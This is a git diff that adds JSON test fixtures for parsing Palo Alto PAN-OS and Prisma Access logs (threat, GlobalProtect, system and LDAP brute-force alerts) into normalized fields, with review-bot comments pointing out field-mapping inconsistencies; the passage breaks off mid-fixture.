+ "message": "{\"TimeReceived\": \"2024-02-06T18:17:09.000000Z\", \"DeviceSN\": \"no-serial\", \"LogType\": \"THREAT\", \"Subtype\": \"file\", \"SubType\": \"file\", \"ConfigVersion\": \"10.2\", \"TimeGenerated\": \"2024-02-06T18:17:02.000000Z\", \"SourceAddress\": \"1.2.3.4\", \"DestinationAddress\": \"5.6.7.8\", \"NATSource\": \"9.10.11.12\", \"NATDestination\": \"5.6.7.8\", \"Rule\": \"Global_Outbound_internet_access\", \"SourceUser\": \"john.doe@example.com\", \"DestinationUser\": null, \"Application\": \"web-browsing\", \"VirtualLocation\": \"vsys1\", \"FromZone\": \"trust\", \"ToZone\": \"untrust\", \"InboundInterface\": \"tunnel.1\", \"OutboundInterface\": \"ethernet1/1\", \"LogSetting\": \"default\", \"SessionID\": 1450762, \"RepeatCount\": 1, \"SourcePort\": 53514, \"DestinationPort\": 80, \"NATSourcePort\": 22444, \"NATDestinationPort\": 80, \"Protocol\": \"tcp\", \"Action\": \"alert\", \"FileName\": \"some_file_name\", \"URLCategory\": \"computer-and-internet-info\", \"VendorSeverity\": \"Low\", \"DirectionOfAttack\": \"server to client\", \"SequenceNo\": 7292474944208657622, \"SourceLocation\": \"Prisma-Mobile-Users-EMEA\", \"DestinationLocation\": \"US\", \"PacketID\": 0, \"FileHash\": null, \"ReportID\": 0, \"DGHierarchyLevel1\": 463, \"DGHierarchyLevel2\": 467, \"DGHierarchyLevel3\": 0, \"DGHierarchyLevel4\": 0, \"VirtualSystemName\": \"\", \"DeviceName\": \"GP cloud service\", \"SourceUUID\": null, \"DestinationUUID\": null, \"IMSI\": 0, \"IMEI\": null, \"ParentSessionID\": 0, \"ParentStartTime\": \"1970-01-01T00:00:00.000000Z\", \"Tunnel\": \"N/A\", \"ContentVersion\": \"577053022\", \"SigFlags\": 0, \"RuleUUID\": \"c38e111b-43fc-4de4-a17c-c372af557193\", \"HTTP2Connection\": 0, \"DynamicUserGroup\": null, \"X-Forwarded-ForIP\": null, \"SourceDeviceCategory\": null, \"SourceDeviceProfile\": null, \"SourceDeviceModel\": null, \"SourceDeviceVendor\": null, \"SourceDeviceOSFamily\": null, \"SourceDeviceOSVersion\": null, \"SourceDeviceHost\": null, \"SourceDeviceMac\": null, \"DestinationDeviceCategory\": null, \"DestinationDeviceProfile\": null, \"DestinationDeviceModel\": null, \"DestinationDeviceVendor\": null, \"DestinationDeviceOSFamily\": null, \"DestinationDeviceOSVersion\": null, \"DestinationDeviceHost\": null, \"DestinationDeviceMac\": null, \"ContainerID\": null, \"ContainerNameSpace\": null, \"ContainerName\": null, \"SourceEDL\": null, \"DestinationEDL\": null, \"HostID\": null, \"EndpointSerialNumber\": null, \"DomainEDL\": null, \"SourceDynamicAddressGroup\": null, \"DestinationDynamicAddressGroup\": null, \"PartialHash\": 0, \"TimeGeneratedHighResolution\": \"2024-02-06T18:17:02.077000Z\", \"ReasonForDataFilteringAction\": null, \"Justification\": null, \"NSSAINetworkSliceType\": null}",
+ "event": {
+ "action": "alert",
+ "category": [
+ "file"
+ ],
+ "dataset": "threat",
+ "outcome": "success",
+ "type": [
+ "info"
+ ]
+ },
+ "@timestamp": "2024-02-06T18:17:02Z",
+ "action": {
+ "name": "alert",
+ "outcome": "success",
+ "type": "file"
+ },
+ "destination": {
+ "address": "5.6.7.8",
+ "geo": {
+ "country_iso_code": "US"
+ },
+ "ip": "5.6.7.8",
+ "nat": {
+ "ip": "5.6.7.8",
+ "port": 80
+ },
+ "port": 80
+ },
+ "file": {
+ "name": "some_file_name"
+ },
+ "log": {
+ "hostname": "GP cloud service",
+ "level": "Low",
+ "logger": "threat"
+ },
+ "network": {
+ "application": "web-browsing"
+ },
+ "observer": {
+ "egress": {
+ "interface": {
+ "alias": "untrust"
+ }
+ },
+ "ingress": {
+ "interface": {
+ "alias": "trust"
+ }
+ },
+ "name": "GP cloud service",
+ "product": "PAN-OS",
+ "serial_number": "no-serial"
+ },
+ "paloalto": {
+ "DGHierarchyLevel1": "463",
+ "DGHierarchyLevel2": "467",
+ "DGHierarchyLevel3": "0",
+ "DGHierarchyLevel4": "0",
+ "DirectionOfAttack": "server to client",
+ "Threat_ContentType": "file",
+ "URLCategory": "computer-and-internet-info",
+ "VirtualLocation": "vsys1"
+ },
+ "related": {
+ "ip": [
+ "1.2.3.4",
+ "5.6.7.8",
+ "9.10.11.12"
+ ],
+ "user": [
+ "example.com",
+ "john.doe@example.com"
+ ]
+ },
+ "rule": {
+ "name": "Global_Outbound_internet_access",
+ "uuid": "c38e111b-43fc-4de4-a17c-c372af557193"
+ },
+ "source": {
+ "address": "1.2.3.4",
+ "ip": "1.2.3.4",
+ "nat": {
+ "ip": "9.10.11.12",
+ "port": 22444
+ },
+ "port": 53514,
+ "user": {
+ "name": "john.doe@example.com"
+ }
+ },
+ "user": {
+ "domain": "john.doe",
+ "email": "john.doe@example.com",
+ "name": "example.com"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_globalprotect.json b/Palo Alto Networks/paloalto-prima-access/tests/test_globalprotect.json
new file mode 100644
index 000000000..f08a677ef
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/test_globalprotect.json
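Review bot: The expected `user` object splits `john.doe@example.com` backwards — `"domain": "john.doe"`, `"name": "example.com"` — and the same split leaks into `related.user`, which pins `example.com` as a user name. As written, the fixture would lock that inversion into the test suite; the expectation (and the parser that produces it) should read `"domain": "example.com"`, `"name": "john.doe"`, with `related.user` holding `john.doe` and `john.doe@example.com`. `source.user.name` keeps the full address while `user.name` gets only one half, so the two blocks describe the same principal differently; aligning them is what makes `related.user` pivots reliable.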
@@ -0,0 +1,77 @@
+{
+ "input": {
+ "message": "1,2024/01/12 11:41:42,015451000023232323,GLOBALPROTECT,0,2562,2024/01/12 11:41:42,vsys1,gateway-switch-to-ssl,tunnel,,SSLVPN,test.fr\\JDOE,FR,2023-01724,1.2.3.4,0.0.0.0,1.2.3.4,0.0.0.0,662f0b44-e024-4a70,PF000000,6.0.4,Windows,\"Microsoft Windows 10 Enterprise , 64-bit\",1,,,,success,,0,,0,CD78_VPN_GP_GATEWAY,5555555555555555555,0x8000000000000000,2024-01-12T11:41:43.895+02:00,,,,,,0,0,0,0,,test-01-01,1"
+ },
+ "expected": {
+ "message": "1,2024/01/12 11:41:42,015451000023232323,GLOBALPROTECT,0,2562,2024/01/12 11:41:42,vsys1,gateway-switch-to-ssl,tunnel,,SSLVPN,test.fr\\JDOE,FR,2023-01724,1.2.3.4,0.0.0.0,1.2.3.4,0.0.0.0,662f0b44-e024-4a70,PF000000,6.0.4,Windows,\"Microsoft Windows 10 Enterprise , 64-bit\",1,,,,success,,0,,0,CD78_VPN_GP_GATEWAY,5555555555555555555,0x8000000000000000,2024-01-12T11:41:43.895+02:00,,,,,,0,0,0,0,,test-01-01,1",
+ "event": {
+ "category": [
+ "session"
+ ],
+ "dataset": "globalprotect",
+ "outcome": "success",
+ "type": [
+ "info"
+ ]
+ },
+ "@timestamp": "2024-01-12T09:41:43.895000Z",
+ "action": {
+ "name": "gateway-switch-to-ssl",
+ "outcome": "success",
+ "type": "0"
+ },
+ "host": {
+ "name": "2023-01724",
+ "os": {
+ "version": "Microsoft Windows 10 Enterprise , 64-bit"
+ }
+ },
+ "log": {
+ "logger": "globalprotect"
+ },
+ "network": {
+ "type": "SSLVPN"
+ },
+ "observer": {
+ "product": "PAN-OS",
+ "serial_number": "PF000000"
+ },
+ "paloalto": {
+ "EventID": "gateway-switch-to-ssl",
+ "Threat_ContentType": "0",
+ "VirtualLocation": "vsys1",
+ "connection": {
+ "stage": "tunnel"
+ }
+ },
+ "related": {
+ "ip": [
+ "1.2.3.4"
+ ],
+ "user": [
+ "JDOE"
+ ]
+ },
+ "source": {
+ "address": "1.2.3.4",
+ "geo": {
+ "country_iso_code": "FR"
+ },
+ "ip": "1.2.3.4",
+ "user": {
+ "domain": "test.fr",
+ "name": "JDOE"
+ }
+ },
+ "user": {
+ "domain": "test.fr",
+ "name": "JDOE"
+ },
+ "user_agent": {
+ "os": {
+ "name": "Windows",
+ "version": "Microsoft Windows 10 Enterprise , 64-bit"
+ }
+ }
+ }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_installed_package_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_installed_package_json.json
new file mode 100644
index 000000000..bbf2d4e97
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/test_installed_package_json.json
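Review bot: `action.type` and `paloalto.Threat_ContentType` are pinned to `"0"`, the literal value of the fifth CSV column of this GLOBALPROTECT record, while the JSON form of the same log type (test_new_globalprotect.json in this commit) yields `globalprotect` for both; the two fixtures therefore disagree on what the type of a GlobalProtect event is. The column is presumably a placeholder in the CSV layout rather than a real subtype, in which case the expectation here should be `"type": "globalprotect"` (or the key omitted) instead of a number-like string, and the parser adjusted to match. Confirm against the PAN-OS GlobalProtect field list before changing either side.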
@@ -0,0 +1,43 @@
+{
+ "input": {
+ "message": "{\"LogTime\":\"2023-02-16T15:49:04.000000Z\",\"LogSourceID\":\"007954000351998\",\"LogType\":\"SYSTEM\",\"Subtype\":\"general\",\"ConfigVersion\":\"10.1\",\"EventTime\":\"2023-02-16T15:48:57.000000Z\",\"VirtualLocation\":\"\",\"EventName\":\"general\",\"EventComponent\":null,\"VendorSeverity\":\"Informational\",\"EventDescription\":\"Installed contents package: panupv2-all-contents-8676-7858.tgz\",\"SequenceNo\":7200776623254143152,\"DGHierarchyLevel1\":0,\"DGHierarchyLevel2\":0,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":null,\"LogSourceName\":\"PA-VM\",\"DeviceGroup\":null,\"Template\":null,\"TimeGeneratedHighResolution\":\"2023-02-16T15:48:57.395000Z\"}\n"
+ },
+ "expected": {
+ "message": "{\"LogTime\":\"2023-02-16T15:49:04.000000Z\",\"LogSourceID\":\"007954000351998\",\"LogType\":\"SYSTEM\",\"Subtype\":\"general\",\"ConfigVersion\":\"10.1\",\"EventTime\":\"2023-02-16T15:48:57.000000Z\",\"VirtualLocation\":\"\",\"EventName\":\"general\",\"EventComponent\":null,\"VendorSeverity\":\"Informational\",\"EventDescription\":\"Installed contents package: panupv2-all-contents-8676-7858.tgz\",\"SequenceNo\":7200776623254143152,\"DGHierarchyLevel1\":0,\"DGHierarchyLevel2\":0,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":null,\"LogSourceName\":\"PA-VM\",\"DeviceGroup\":null,\"Template\":null,\"TimeGeneratedHighResolution\":\"2023-02-16T15:48:57.395000Z\"}\n",
+ "event": {
+ "category": [
+ "host"
+ ],
+ "dataset": "system",
+ "module": "contents",
+ "reason": "Installed contents package: panupv2-all-contents-8676-7858.tgz",
+ "type": [
+ "info"
+ ]
+ },
+ "@timestamp": "2023-02-16T15:48:57Z",
+ "action": {
+ "type": "general"
+ },
+ "file": {
+ "name": "panupv2-all-contents-8676-7858.tgz"
+ },
+ "host": {
+ "name": "PA-VM"
+ },
+ "log": {
+ "level": "Informational",
+ "logger": "system"
+ },
+ "observer": {
+ "product": "PAN-OS"
+ },
+ "paloalto": {
+ "DGHierarchyLevel1": "0",
+ "DGHierarchyLevel2": "0",
+ "DGHierarchyLevel3": "0",
+ "DGHierarchyLevel4": "0",
+ "Threat_ContentType": "general"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_ldap_brute_force.json b/Palo Alto Networks/paloalto-prima-access/tests/test_ldap_brute_force.json
new file mode 100644
index 000000000..aab8fbd6b
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/test_ldap_brute_force.json
@@ -0,0 +1,89 @@
+{
+ "input": {
+ "message": "1,2024/08/03 12:16:42,012001002253,THREAT,vulnerability,2561,2024/08/03 12:17:45,5.6.7.8,1.2.3.4,0.0.0.0,0.0.0.0,IN_VPN-AZURE-ALSID,,paloaltonetwork\\\\username,ldap,vsys1,VPN,LAN,tunnel.3,ethernet1/4,default,2024/08/03 12:17:45,110079,1,62074,389,0,0,0x80002000,tcp,alert,,LDAP: User Login Brute Force Attempt(40005),any,high,client-to-server,7395125856205392467,0x8000000000000000,192.168.0.0-192.168.255.255,172.16.0.0-172.31.255.255,,,1210225322167894624,,,0,,,,,,,,0,24,315,0,0,,hostname_example,,,,,0,,0,,N/A,brute-force,AppThreat-8877-8886,0x0,0,4294967295,,,2c146dd4-d96a-455f-96fc-7f3e2c37c70d,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,2024-08-03T12:17:45.360+02:00,,,,auth-service,business-systems,client-server,2,\\\"has-known-vulnerability,tunnel-other-application,pervasive-use\\\",,untunneled,no,no,"
+ },
+ "expected": {
+ "message": "1,2024/08/03 12:16:42,012001002253,THREAT,vulnerability,2561,2024/08/03 12:17:45,5.6.7.8,1.2.3.4,0.0.0.0,0.0.0.0,IN_VPN-AZURE-ALSID,,paloaltonetwork\\\\username,ldap,vsys1,VPN,LAN,tunnel.3,ethernet1/4,default,2024/08/03 12:17:45,110079,1,62074,389,0,0,0x80002000,tcp,alert,,LDAP: User Login Brute Force Attempt(40005),any,high,client-to-server,7395125856205392467,0x8000000000000000,192.168.0.0-192.168.255.255,172.16.0.0-172.31.255.255,,,1210225322167894624,,,0,,,,,,,,0,24,315,0,0,,hostname_example,,,,,0,,0,,N/A,brute-force,AppThreat-8877-8886,0x0,0,4294967295,,,2c146dd4-d96a-455f-96fc-7f3e2c37c70d,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,2024-08-03T12:17:45.360+02:00,,,,auth-service,business-systems,client-server,2,\\\"has-known-vulnerability,tunnel-other-application,pervasive-use\\\",,untunneled,no,no,",
+ "event": {
+ "action": "alert",
+ "category": [
+ "vulnerability"
+ ],
+ "code": "40005",
+ "dataset": "threat",
+ "outcome": "success",
+ "reason": "LDAP: User Login Brute Force Attempt",
+ "type": [
+ "info"
+ ]
+ },
+ "@timestamp": "2024-08-03T10:17:45.360000Z",
+ "action": {
+ "name": "alert",
+ "outcome": "success",
+ "type": "vulnerability"
+ },
+ "destination": {
+ "address": "1.2.3.4",
+ "ip": "1.2.3.4",
+ "nat": {
+ "ip": "0.0.0.0",
+ "port": 0
+ },
+ "port": 389,
+ "user": {
+ "domain": "paloaltonetwork",
+ "name": "username"
+ }
+ },
+ "log": {
+ "hostname": "hostname_example",
+ "level": "high",
+ "logger": "threat"
+ },
+ "network": {
+ "application": "ldap",
+ "transport": "tcp"
+ },
+ "observer": {
+ "name": "hostname_example",
+ "product": "PAN-OS",
+ "serial_number": "012001002253"
+ },
+ "paloalto": {
+ "DGHierarchyLevel1": "24",
+ "DGHierarchyLevel2": "315",
+ "DGHierarchyLevel3": "0",
+ "DGHierarchyLevel4": "0",
+ "Threat_ContentType": "vulnerability",
+ "VirtualLocation": "vsys1",
+ "threat": {
+ "id": "40005",
+ "name": "LDAP: User Login Brute Force Attempt"
+ }
+ },
+ "related": {
+ "ip": [
+ "0.0.0.0",
+ "1.2.3.4",
+ "5.6.7.8"
+ ],
+ "user": [
+ "username"
+ ]
+ },
+ "rule": {
+ "name": "IN_VPN-AZURE-ALSID",
+ "uuid": "2c146dd4-d96a-455f-96fc-7f3e2c37c70d"
+ },
+ "source": {
+ "address": "5.6.7.8",
+ "ip": "5.6.7.8",
+ "nat": {
+ "ip": "0.0.0.0",
+ "port": 0
+ },
+ "port": 62074
+ }
+ }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_new_file_type.json b/Palo Alto Networks/paloalto-prima-access/tests/test_new_file_type.json
new file mode 100644
index 000000000..610ab7c24
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/test_new_file_type.json
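Review bot: `related.ip` pins `0.0.0.0` as a correlatable address: both `nat.ip` values are the unset placeholder `0.0.0.0` with `port: 0`, and they are propagated into the pivot list, so every NAT-less session from this intake will share an "IP" with every other. The JSON fixture test_new_threat_type.json in this commit shows the parser already omits `nat.ip` when `NATSource` is empty; treating `0.0.0.0` the same way would keep the two input forms consistent, and the expectation here would become `"ip": ["1.2.3.4", "5.6.7.8"]` with the two `nat` objects reduced to `"port": 0` or dropped. Whether `0.0.0.0` can ever be a legitimate NAT address in PAN-OS logs is not visible from the fixture, so confirm before changing the parser.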
@@ -0,0 +1,106 @@
+{
+ "input": {
+ "message": "{\"TimeReceived\":\"2024-07-08T08:33:33.000000Z\",\"DeviceSN\":\"007954000XXXXXX\",\"LogType\":\"THREAT\",\"Subtype\":\"file\",\"SubType\":\"file\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-07-08T15:30:04.000000Z\",\"SourceAddress\":\"4.3.2.1\",\"DestinationAddress\":\"5.2.1.8\",\"NATSource\":\"2.2.1.6\",\"NATDestination\":\"5.2.1.8\",\"Rule\":\"Guest_Mobile_Internet Access\",\"SourceUser\":null,\"DestinationUser\":null,\"Application\":\"web-browsing\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"DTT\",\"ToZone\":\"Untrust\",\"InboundInterface\":\"ethernet1/1.111\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Panorama_CDL\",\"SessionID\":6111111,\"RepeatCount\":1,\"SourcePort\":42222,\"DestinationPort\":80,\"NATSourcePort\":22408,\"NATDestinationPort\":80,\"Protocol\":\"tcp\",\"Action\":\"alert\",\"FileName\":\"test_file.bin\",\"URLCategory\":\"business-and-economy\",\"VendorSeverity\":\"Low\",\"DirectionOfAttack\":\"server to client\",\"SequenceNo\":73503956876,\"SourceLocation\":\"1.2.0.0-1.2.255.255\",\"DestinationLocation\":\"US\",\"PacketID\":0,\"FileHash\":null,\"ReportID\":0,\"DGHierarchyLevel1\":999,\"DGHierarchyLevel2\":1111,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"DN-TEST-F2\",\"SourceUUID\":null,\"DestinationUUID\":null,\"IMSI\":0,\"IMEI\":null,\"ParentSessionID\":0,\"ParentStartTime\":\"1970-01-01T00:00:00.000000Z\",\"Tunnel\":\"N/A\",\"ContentVersion\":\"581116536\",\"SigFlags\":0,\"RuleUUID\":\"6935060f-6443-4257-91f8\",\"HTTP2Connection\":0,\"DynamicUserGroup\":null,\"X-Forwarded-ForIP\":null,\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":\"1.0.0\",\"SourceDeviceHost\":\"Test-device\",\"SourceDeviceMac\":\"11.22.33.44.55.66\",\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"HostID\":null,\"EndpointSerialNumber\":null,\"DomainEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"PartialHash\":0,\"TimeGeneratedHighResolution\":\"2024-07-08T15:30:04.855000Z\",\"ReasonForDataFilteringAction\":null,\"Justification\":null,\"NSSAINetworkSliceType\":null}",
+ "sekoiaio": {
+ "intake": {
+ "dialect": "Palo Alto NGFW",
+ "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd"
+ }
+ }
+ },
+ "expected": {
+ "message": "{\"TimeReceived\":\"2024-07-08T08:33:33.000000Z\",\"DeviceSN\":\"007954000XXXXXX\",\"LogType\":\"THREAT\",\"Subtype\":\"file\",\"SubType\":\"file\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-07-08T15:30:04.000000Z\",\"SourceAddress\":\"4.3.2.1\",\"DestinationAddress\":\"5.2.1.8\",\"NATSource\":\"2.2.1.6\",\"NATDestination\":\"5.2.1.8\",\"Rule\":\"Guest_Mobile_Internet Access\",\"SourceUser\":null,\"DestinationUser\":null,\"Application\":\"web-browsing\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"DTT\",\"ToZone\":\"Untrust\",\"InboundInterface\":\"ethernet1/1.111\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Panorama_CDL\",\"SessionID\":6111111,\"RepeatCount\":1,\"SourcePort\":42222,\"DestinationPort\":80,\"NATSourcePort\":22408,\"NATDestinationPort\":80,\"Protocol\":\"tcp\",\"Action\":\"alert\",\"FileName\":\"test_file.bin\",\"URLCategory\":\"business-and-economy\",\"VendorSeverity\":\"Low\",\"DirectionOfAttack\":\"server to client\",\"SequenceNo\":73503956876,\"SourceLocation\":\"1.2.0.0-1.2.255.255\",\"DestinationLocation\":\"US\",\"PacketID\":0,\"FileHash\":null,\"ReportID\":0,\"DGHierarchyLevel1\":999,\"DGHierarchyLevel2\":1111,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"DN-TEST-F2\",\"SourceUUID\":null,\"DestinationUUID\":null,\"IMSI\":0,\"IMEI\":null,\"ParentSessionID\":0,\"ParentStartTime\":\"1970-01-01T00:00:00.000000Z\",\"Tunnel\":\"N/A\",\"ContentVersion\":\"581116536\",\"SigFlags\":0,\"RuleUUID\":\"6935060f-6443-4257-91f8\",\"HTTP2Connection\":0,\"DynamicUserGroup\":null,\"X-Forwarded-ForIP\":null,\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":\"1.0.0\",\"SourceDeviceHost\":\"Test-device\",\"SourceDeviceMac\":\"11.22.33.44.55.66\",\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"HostID\":null,\"EndpointSerialNumber\":null,\"DomainEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"PartialHash\":0,\"TimeGeneratedHighResolution\":\"2024-07-08T15:30:04.855000Z\",\"ReasonForDataFilteringAction\":null,\"Justification\":null,\"NSSAINetworkSliceType\":null}",
+ "event": {
+ "action": "alert",
+ "category": [
+ "file"
+ ],
+ "dataset": "threat",
+ "outcome": "success",
+ "type": [
+ "info"
+ ]
+ },
+ "@timestamp": "2024-07-08T15:30:04Z",
+ "action": {
+ "name": "alert",
+ "outcome": "success",
+ "type": "file"
+ },
+ "destination": {
+ "address": "5.2.1.8",
+ "geo": {
+ "country_iso_code": "US"
+ },
+ "ip": "5.2.1.8",
+ "nat": {
+ "ip": "5.2.1.8",
+ "port": 80
+ },
+ "port": 80
+ },
+ "file": {
+ "name": "test_file.bin"
+ },
+ "host": {
+ "mac": "11.22.33.44.55.66",
+ "name": "Test-device",
+ "os": {
+ "version": "1.0.0"
+ }
+ },
+ "log": {
+ "hostname": "DN-TEST-F2",
+ "level": "Low",
+ "logger": "threat"
+ },
+ "network": {
+ "application": "web-browsing"
+ },
+ "observer": {
+ "egress": {
+ "interface": {
+ "alias": "Untrust"
+ }
+ },
+ "ingress": {
+ "interface": {
+ "alias": "DTT"
+ }
+ },
+ "name": "DN-TEST-F2",
+ "product": "PAN-OS",
+ "serial_number": "007954000XXXXXX"
+ },
+ "paloalto": {
+ "DGHierarchyLevel1": "999",
+ "DGHierarchyLevel2": "1111",
+ "DGHierarchyLevel3": "0",
+ "DGHierarchyLevel4": "0",
+ "DirectionOfAttack": "server to client",
+ "Threat_ContentType": "file",
+ "URLCategory": "business-and-economy",
+ "VirtualLocation": "vsys1"
+ },
+ "related": {
+ "ip": [
+ "2.2.1.6",
+ "4.3.2.1",
+ "5.2.1.8"
+ ]
+ },
+ "rule": {
+ "name": "Guest_Mobile_Internet Access",
+ "uuid": "6935060f-6443-4257-91f8"
+ },
+ "source": {
+ "address": "4.3.2.1",
+ "ip": "4.3.2.1",
+ "nat": {
+ "ip": "2.2.1.6",
+ "port": 22408
+ },
+ "port": 42222
+ }
+ }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_new_globalprotect.json b/Palo Alto Networks/paloalto-prima-access/tests/test_new_globalprotect.json
new file mode 100644
index 000000000..25db7ff0a
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/test_new_globalprotect.json
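Review bot: `host.mac` pins the vendor's dot-separated form `11.22.33.44.55.66`; ECS specifies MAC addresses as uppercase hyphen-separated hex (`11-22-33-44-55-66`), so values from this intake will never match MACs recorded by other sources in the same index. If the parser is meant to normalize, the expectation should be `"mac": "11-22-33-44-55-66"`; if the vendor's separator is kept deliberately, the raw value is better placed under `paloalto.*` than in the ECS field. The sample also has `TimeGenerated` (15:30:04Z) seven hours after `TimeReceived` (08:33:33Z), which suggests the generated timestamp is a local time labelled as UTC; `@timestamp` inherits it unchanged, so this is worth checking against a real device rather than fixing in the fixture.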
@@ -0,0 +1,73 @@
+{
+ "input": {
+ "message": "{\"TimeReceived\":\"2024-07-08T09:01:14.000000Z\",\"DeviceSN\":\"00795700000000\",\"LogType\":\"GLOBALPROTECT\",\"Subtype\":\"globalprotect\",\"LogSubtype\":\"globalprotect\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-07-08T09:01:14.000000Z\",\"VirtualSystem\":\"vsys1\",\"EventIDValue\":\"gateway-logout\",\"Stage\":\"logout\",\"AuthMethod\":null,\"TunnelType\":null,\"SourceUserName\":\"joe.doe@test.com\",\"SourceRegion\":\"1.0.0.0-1.255.255.255\",\"EndpointDeviceName\":\"LNL-test\",\"PublicIPv4\":\"1.5.7.3\",\"PublicIPv6\":\"\",\"PrivateIPv4\":\"1.2.3.4\",\"PrivateIPv6\":\"\",\"HostID\":\"e4f14dfd-bd3c-40e5-9c4e\",\"EndpointSN\":\"5CD4153333\",\"GlobalProtectClientVersion\":\"0.0.-1\",\"EndpointOSType\":\"Windows\",\"EndpointOSVersion\":\"Microsoft Windows 11 Enterprise , 64-bit\",\"RepeatCount\":1,\"CountOfRepeats\":1,\"QuarantineReason\":null,\"ConnectionError\":null,\"Description\":\"client logout\",\"EventStatus\":\"success\",\"GlobalProtectGatewayLocation\":null,\"LoginDuration\":3625,\"ConnectionMethod\":null,\"ConnectionErrorID\":0,\"Portal\":\"Internal_test\",\"SequenceNo\":7359635570821640000,\"TimeGeneratedHighResolution\":\"2024-07-08T09:01:14.449000Z\",\"GatewaySelectionType\":\"\",\"SSLResponseTime\":-1,\"GatewayPriority\":null,\"AttemptedGateways\":null,\"Gateway\":null,\"DGHierarchyLevel1\":556,\"DGHierarchyLevel2\":0,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"DG-test\",\"VirtualSystemID\":1}",
+ "sekoiaio": {
+ "intake": {
+ "dialect": "Palo Alto NGFW",
+ "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd"
+ }
+ }
+ },
+ "expected": {
+ "message": "{\"TimeReceived\":\"2024-07-08T09:01:14.000000Z\",\"DeviceSN\":\"00795700000000\",\"LogType\":\"GLOBALPROTECT\",\"Subtype\":\"globalprotect\",\"LogSubtype\":\"globalprotect\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-07-08T09:01:14.000000Z\",\"VirtualSystem\":\"vsys1\",\"EventIDValue\":\"gateway-logout\",\"Stage\":\"logout\",\"AuthMethod\":null,\"TunnelType\":null,\"SourceUserName\":\"joe.doe@test.com\",\"SourceRegion\":\"1.0.0.0-1.255.255.255\",\"EndpointDeviceName\":\"LNL-test\",\"PublicIPv4\":\"1.5.7.3\",\"PublicIPv6\":\"\",\"PrivateIPv4\":\"1.2.3.4\",\"PrivateIPv6\":\"\",\"HostID\":\"e4f14dfd-bd3c-40e5-9c4e\",\"EndpointSN\":\"5CD4153333\",\"GlobalProtectClientVersion\":\"0.0.-1\",\"EndpointOSType\":\"Windows\",\"EndpointOSVersion\":\"Microsoft Windows 11 Enterprise , 64-bit\",\"RepeatCount\":1,\"CountOfRepeats\":1,\"QuarantineReason\":null,\"ConnectionError\":null,\"Description\":\"client logout\",\"EventStatus\":\"success\",\"GlobalProtectGatewayLocation\":null,\"LoginDuration\":3625,\"ConnectionMethod\":null,\"ConnectionErrorID\":0,\"Portal\":\"Internal_test\",\"SequenceNo\":7359635570821640000,\"TimeGeneratedHighResolution\":\"2024-07-08T09:01:14.449000Z\",\"GatewaySelectionType\":\"\",\"SSLResponseTime\":-1,\"GatewayPriority\":null,\"AttemptedGateways\":null,\"Gateway\":null,\"DGHierarchyLevel1\":556,\"DGHierarchyLevel2\":0,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"DG-test\",\"VirtualSystemID\":1}",
+ "event": {
+ "category": [
+ "session"
+ ],
+ "dataset": "globalprotect",
+ "reason": "client logout",
+ "type": [
+ "info"
+ ]
+ },
+ "@timestamp": "2024-07-08T09:01:14Z",
+ "action": {
+ "type": "globalprotect"
+ },
+ "host": {
+ "name": "LNL-test"
+ },
+ "log": {
+ "hostname": "DG-test",
+ "logger": "globalprotect"
+ },
